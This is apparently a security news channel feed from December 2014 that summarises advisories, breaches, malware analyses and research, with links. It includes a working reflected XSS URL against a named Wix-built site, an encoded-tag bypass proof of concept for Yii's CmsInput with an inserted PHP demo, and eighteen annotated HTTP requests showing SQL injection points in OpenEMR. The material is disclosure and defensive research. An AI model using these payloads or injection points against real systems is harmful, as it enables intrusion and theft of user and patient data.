Channel: BOT24

Security advisory – High severity – InfiniteWP Client WordPress plugin

If you’re using the InfiniteWP WordPress Client plugin to manage your website, now is a good time to update. While doing a routine audit of our Website Firewall product, we discovered a vulnerability in the plugin that could be used by a malicious individual to 1) disable a user's website by putting it in maintenance mode and 2) control the content of the maintenance page.

more here........http://blog.sucuri.net/2014/12/security-advisory-high-severity-infinitewp-client-wordpress-plugin.html

XSS in WIX pages

57 million web pages are affected by a security problem in wix.com

Proof of concept of a web page made in wix.com:
http://www.itsec.cl/

Viewing the source code shows the following:

...
Find the SEO content of this site's homepage via http://www.itsec.cl/?_escaped_fragment_=
(That is where search engines like Google go to read your homepage's content.)
...

I tried to access an existing section and added a third, invalid parameter, then launched the attack code:

Valid URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/

XSS URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/x"><script>alert('xss')</script>

How cheap is expensive.


/Devsec, Security Department. Chile./

Yii framework CmsInput extension improper XSS sanitation

[+] Yii framework CmsInput extension [1] improper XSS sanitation
[+] Discovered by: Jos Wetzels
[+] Affects: Yii framework CmsInput extension <= version 1.2

Yii framework's CmsInput extension versions 1.2 and prior suffer from
an improper XSS sanitation implementation that introduces XSS
vulnerabilities in web applications developed by third-party framework
users [3]. The issue has now been resolved in cooperation with the
author [2].
CmsInput is an extension of the Yii framework designed to wrap
HtmlPurifier and the Codeigniter Security class in a single component
for user-input sanitation. The problem resides in CmsInput's default
cleaning method stripClean in CmsInput.php:

    public function stripClean($str)
    {
        return $this->xssClean($this->stripTags($str));
    }

What happens is that stripTags is called on the user-supplied input
before xssClean is called. stripTags is designed to eliminate all HTML
and PHP tags from the user-supplied input by wrapping PHP's strip_tags
[4] function. xssClean is a wrapper for Codeigniter's xss_clean [5]
function, which aims to strip user-supplied input of all suspicious
XSS-related input. Within xssClean, the user-supplied input is
URL-decoded before further processing:

    $str = rawurldecode($str);

The problem arises when stripClean is used to sanitize a URL-encoded
user-supplied string, which is then later used under the assumption it
was stripped of all possible XSS vectors. Since stripTags simply
eliminates all raw HTML and PHP tags and a URL-encoded string contains
none, the string gets passed to xssClean in unchanged form, where it
will be URL-decoded into a string containing HTML tags, thus allowing
injection of (a limited subset of) HTML elements in unintended
locations.

Proof of Concept:

stripClean("%3Cimg%20src%20%3D%20%22http%3A%2F%2Ftest.com%2Fcsrf.php%22%3E")
= '<img src = "http://test.com/csrf.php">'

[*] Mitigation:
Upgrade to CmsInput version 1.3 [2]

[*] References:

1. http://www.yiiframework.com/extension/input/
2. http://www.yiiframework.com/extension/input/#hh7
3. Eg.: https://www.humhub.org/
4. http://php.net/manual/en/function.strip-tags.php
5. https://ellislab.com/codeigniter/user-guide/libraries/security.html
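
The ordering problem described in the advisory above, as an added PHP example that is not CmsInput's code and not the version 1.3 fix. `decodeOnly` stands in for the single `rawurldecode` step quoted from xssClean; the function names and the second and third sample inputs are constructed for illustration.

```php
<?php
// Added example, not CmsInput's code. decodeOnly() is a stand-in for the one
// step of xssClean that the advisory quotes (rawurldecode); the real
// xss_clean applies further filters that are not reproduced here.
function decodeOnly(string $str): string
{
    return rawurldecode($str);
}

// Order described in the advisory: tags are stripped while the input is
// still URL-encoded, so strip_tags() finds no markup to remove, and the
// later decode step turns the string back into HTML.
function stripThenDecode(string $str): string
{
    return decodeOnly(strip_tags($str));
}

// Corrected order (an assumption about one sound ordering, not the 1.3
// patch): decode until the string stops changing, with a bound on the
// number of passes, and only then strip tags.
function decodeThenStrip(string $str, int $maxRounds = 5): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $decoded = rawurldecode($str);
        if ($decoded === $str) {
            return strip_tags($str);
        }
        $str = $decoded;
    }
    // Still changing after $maxRounds passes: reject instead of guessing.
    return '';
}

// Encoding at the point of output neutralises whatever a filter missed.
function forHtml(string $str): string
{
    return htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$samples = [
    // Input taken from the advisory's proof of concept.
    'advisory PoC' => '%3Cimg%20src%20%3D%20%22http%3A%2F%2Ftest.com%2Fcsrf.php%22%3E',
    // Constructed: the same markup URL-encoded twice.
    'encoded twice' => '%253Cimg%2520src%253D%2522http%253A%252F%252Ftest.com%252Fcsrf.php%2522%253E',
    // Constructed: harmless input that must survive sanitising.
    'plain text' => 'hello%20world',
];

foreach ($samples as $label => $input) {
    printf(
        "%s\n  strip-then-decode: %s\n  decode-then-strip: %s\n  html-encoded:      %s\n",
        $label,
        var_export(stripThenDecode($input), true),
        var_export(decodeThenStrip($input), true),
        var_export(forHtml(stripThenDecode($input)), true)
    );
}
```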

Incident Report - DDoS Attack

This past Monday, we experienced a major volumetric DDoS attack which caused significant downtime for our site and the sites of our customers. The attack included sustained traffic of up to 25gb/s and about 50 million packets per second sent to our servers. I am very sorry that this outage happened and had such sustained and wide reaching effects. We have assembled here what we know about the attack, what we did to mitigate it, and the steps we are taking to mitigate similar attacks. The following post-mortem is a collaboration from the entire DNSimple team.

more here........http://blog.dnsimple.com/2014/12/incident-report-ddos/

XSS Payloads

For several years I've been looking for different types of payloads I could use or adapt to my XSS exploits. I ended up with pieces of code spread everywhere, spending more time to search for what I needed than just rewriting it...

Obviously it was time to organize a little bit all this mess, and to share. I could build this library thanks to many people who help me learn, and code. Now it is my turn to share. Enjoy!

more here..........http://www.xss-payloads.com/

Sony hacking: were PlayStation servers used to spread stolen data?

Following the release of confidential documents and four unreleased films, in the Sony hacking reported by We Live Security here, the bad news for the company continued as it was reported that the company’s own PlayStation servers were used to distribute the stolen data, The Independent reports.

more here......http://www.welivesecurity.com/2014/12/03/sony-hacking-playstation-servers-used-spread-stolen-data/

SektionEins releases Suhosin 0.9.37

SektionEins is proud to announce the release of the PHP security extension Suhosin version 0.9.37.
more here.......https://www.sektioneins.de/en/blog/14-12-03-suhosin-release-0.9.37.html

PEN TESTING: CROSS SITE SCRIPTING (XSS)

Cross Site Scripting (XSS) is the first test in a series of controls which exist to protect user data, prevent fraud and secure the organization’s web application and environment.

Cross Site Scripting (XSS) is a common application layer web attack that, despite originating from a website is actually executed on the users’ computer.

more here.........http://www.risk3sixty.com/2014/12/04/pen-testing-cross-site-scripting-xss/

An Analysis of the “Destructive” Malware Behind FBI Warnings

TrendLabs engineers were recently able to obtain a malware sample of the “destructive malware” described in reports about the Federal Bureau of Investigation (FBI) warning to U.S. businesses last December 2. According to Reuters, the FBI issued a warning to businesses to remain vigilant against this new “destructive” malware in the wake of the recent Sony Pictures attack. As of this writing, the link between the Sony breach and the  malware mentioned by the FBI has yet to be verified.

The FBI flash memo titled “#A-000044-mw” describes an overview of the malware behavior, which reportedly has the capability to override all data on hard drives of computers, including the master boot record, which prevents them from booting up.

Below is an analysis of our own findings here...........http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-the-destructive-malware-behind-fbi-warnings/

Paper: Apposcopy: Semantics-Based Detection of Android Malware through Static Analysis

We present Apposcopy, a new semantics-based approach for
identifying a prevalent class of Android malware that steals
private user information. Apposcopy incorporates (i) a
high-level language for specifying signatures that describe
semantic characteristics of malware families and (ii) a static
analysis for deciding if a given application matches a malware
signature. The signature matching algorithm of Apposcopy
uses a combination of static taint analysis and a new form of
program representation called Inter-Component Call Graph
to efficiently detect Android applications that have certain
control- and data-flow properties. We have evaluated
Apposcopy on a corpus of real-world Android applications and
show that it can effectively and reliably pinpoint malicious
applications that belong to certain malware families.

more here...........http://cs.stanford.edu/people/saswat/research/apposcopy.pdf

When cookies lead to a DoS in phpMyAdmin CVE-2014-9218

"phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL, MariaDB and Drizzle. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement."

Before starting with our findings, we would like to thank phpMyAdmin security team for their quick response and for their interest in keeping their software secure.

more here........http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html

CVE-2014-6332: Life is all Rainbows and Unicorns

Though just patched earlier this month, the CVE-2014-6332 vulnerability shares its age with Yahoo, Neopets, and the hit TV show, Friends. This Windows vulnerability, also known as the “Unicorn” bug, has been exploited in the wild with help of a Visual Basic Script. It impacts almost every version of Microsoft Windows from Windows 95 onwards, and can be exploited in Internet Explorer versions 3 to 11, inclusive. This complex vulnerability gets its name from being extremely rare, somewhat like a unicorn. After all, it’s not every day you come across a unicorn galloping through your front yard.

more here.........http://labs.bromium.com/2014/12/04/cve-2014-6332-life-is-all-rainbows-and-unicorns/

Week to Weak: The Weaponization of Cyber Vulnerabilities

Key findings of this report include:
• Following the announcement of a vulnerability, it
takes a little more than a week for an associated
exploit to be detected on the open web, leaving
system administrators a small window of time to
evaluate and apply patches - if available.
• Java, Adobe Flash, and Internet Explorer produced
the greatest number of vulnerability/detected
exploit pairs.
• Microsoft Office exploits fester the longest before
the underlying vulnerability is detected.
• Evidence of Apple products exploitation appears
the quickest following the announcement of a
vulnerability.
• The difference between open source and proprietary
software exploitation is insignificant, somewhat
contradicting the popular “Linus law” that states
that “given enough eyeballs, all bugs are shallow

more here..........http://info.recordedfuture.com/Portals/252628/resources/week-to-weak-report.pdf

Attack on Trust Threat Bulletin: Sony Breach Leaks Private Keys, Leaving Door Open

On 24 November news of a major breach at Sony Pictures Entertainment was reported. An organization self-described as the Guardians of Peace (also known by #GOP) claimed responsibility. The group released compressed archives of over 217MB that the organization claims contains Sony data. Those able to access the data reported dozens of SSH private keys were included in the exfiltrated data.

more here........https://www.venafi.com/blog/post/attack-on-trust-threat-bulletin-sony-breach

SpoofedMe Social Login Attack

IBM X-Force Finds Social Login Attack That Allows Intrusion to Many Websites’ Local Accounts

more here.......http://securityintelligence.com/spoofedme-social-login-attack-discovered-by-ibm-x-force-researchers/#.VIC5jTHF-So

Guest timing attacks vs hash tables

First, start with there are no good constant-time data structures. After reading the HN thread, I wanted to see if the attack was truly viable. Can we recover a JSESSIONID? My previous efforts attacking Lua took a slightly different tack.


more here......http://www.tedunangst.com/flak/post/timing-attacks-vs-hash-tables

Credit Card Breach at Bebe Stores

Data gathered from several financial institutions and at least one underground cybercrime shop suggest that thieves have stolen credit and debit card data from Bebe Stores Inc., a nationwide chain of some 200 women’s clothing stores.

more here........https://krebsonsecurity.com/2014/12/banks-credit-card-breach-at-bebe-stores/

Python Kerberos Exploitation Kit

PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)

For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324).

more here..........https://github.com/bidord/pykek

CVE-2014-5462 - Multiple Authenticated SQL Injections In OpenEMR

Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR
CVE: CVE-2014-5462
Vendor: OpenEMR
Product: OpenEMR
Affected version: 4.1.2(7) and earlier
Fixed version: N/A
Reported by: Jerzy Kramarz
Details:

SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.

The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:

Request 1

POST /openemr/interface/super/edit_layout.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7
[...]
Content-Length: 134

formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS<SQL Injection>


Request 2

POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
[...]
Content-Length: 135

form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>


Request 3

POST /openemr/interface/billing/edit_payment.php HTTP/1.1
Host: 192.168.56.102
[...]
Content-Length: 186
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en

CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1<SQL Injection>&ParentPage=&hidden_patient_code=&global_amount=&mode=


Request 4

GET /openemr/interface/forms_admin/forms_admin.php?id=17<SQL Injection>&method=enable HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
Connection: keep-alive


Request 5

POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en

----------1034262177
Content-Disposition: form-data; name="form_pid"

5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_without"

on
----------1034262177
Content-Disposition: form-data; name="form_deposit_date"

5
----------1034262177
Content-Disposition: form-data; name="form_paydate"

5
----------1034262177
Content-Disposition: form-data; name="form_category"

All
----------1034262177
Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
Content-Type: text/plain

boom
----------1034262177
Content-Disposition: form-data; name="MAX_FILE_SIZE"

5000000
----------1034262177
Content-Disposition: form-data; name="form_amount"

5
----------1034262177
Content-Disposition: form-data; name="form_encounter"

5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_to_date"

5
----------1034262177
Content-Disposition: form-data; name="form_payer_id"

2
----------1034262177
Content-Disposition: form-data; name="form_source"

5
----------1034262177
Content-Disposition: form-data; name="form_name"

BOOOM
----------1034262177
Content-Disposition: form-data; name="form_search"

Search
----------1034262177
Content-Disposition: form-data; name="form_date"

5-5-5
----------1034262177--



Request 6

GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=<SQL Injection>&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en


Request 7

POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0

form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4<SQL Injection>&form_from_date=0000-00-


Request 8

POST /openemr/interface/orders/pending_followup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original

form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5<SQL Injection>&form_from_date=2014-07-25


Request 9

POST /openemr/interface/orders/pending_orders.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5

form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4<SQL Injection>&form_from_date=2014-07-25


Request 10

POST /openemr/interface/patient_file/deleter.php?patient=<SQL Injection>&encounterid=<SQL Injection>&formid=<SQL Injection>&issue=<SQL Injection>&document=&payment=&billing=&transaction= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0

form_submit=Yes%2c+Delete+and+Log


Request 11

POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154

Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5<SQL Injection>


Request 12

POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154

text=5<SQL Injection>&submitbtn=Search&mode=search


Request 13

POST /openemr/interface/practice/ins_search.php HTTP/1.1
Host: 192.168.56.102
Accept: */*
Accept-Language: en
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0

form_addr1=1<SQL Injection>&form_addr2=1<SQL Injection>&form_attn=5<SQL Injection>&form_country=U<SQL Injection>&form_freeb_type=2<SQL Injection>&form_phone=555-555-5555&form_partner=<SQL Injection>&form_name=P<SQL Injection>&form_zip=36<SQL Injection>&form_save=Save+as+New&form_state=W<SQL Injection>&form_city=W<SQL Injection>&form_cms_id=5<SQL Injection>


Request 14

POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6

form_pelist=%2f&form_pid=0<SQL Injection>&form_save=Save&form_key=e


Request 15

POST /openemr/interface/reports/appointments_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5

form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=<SQL Injection>&form_provider=1<SQL Injection>&form_apptstatus=<SQL Injection>&with_out_facility=on&form_facility=4<SQL Injection>&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date


Request 16

POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci

form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1<SQL Injection>&form_i1subscriber_employer_country=USA&form_deceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_employer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female


Request 17

GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
Connection: keep-alive


Request 18

GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225


Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

DeathRing: Pre-loaded malware hits smartphones for the second time in 2014

When you walk out of a retailer with a shiny new phone, you trust that it’s clean and safe to use. But this might not always be the case, as evidenced by the latest pre-loaded malware Lookout identified called DeathRing. DeathRing is a Chinese Trojan that is pre-installed on a number of smartphones most popular in Asian and African countries. Detection volumes are moderate, though we consider this a concerning threat given its pre-loaded nature and the fact that we are actively seeing detections of it around the world.

Read more: DeathRing: Pre-loaded malware hits smartphones for the second time in 2014 (https://blog.lookout.com/?p=15835)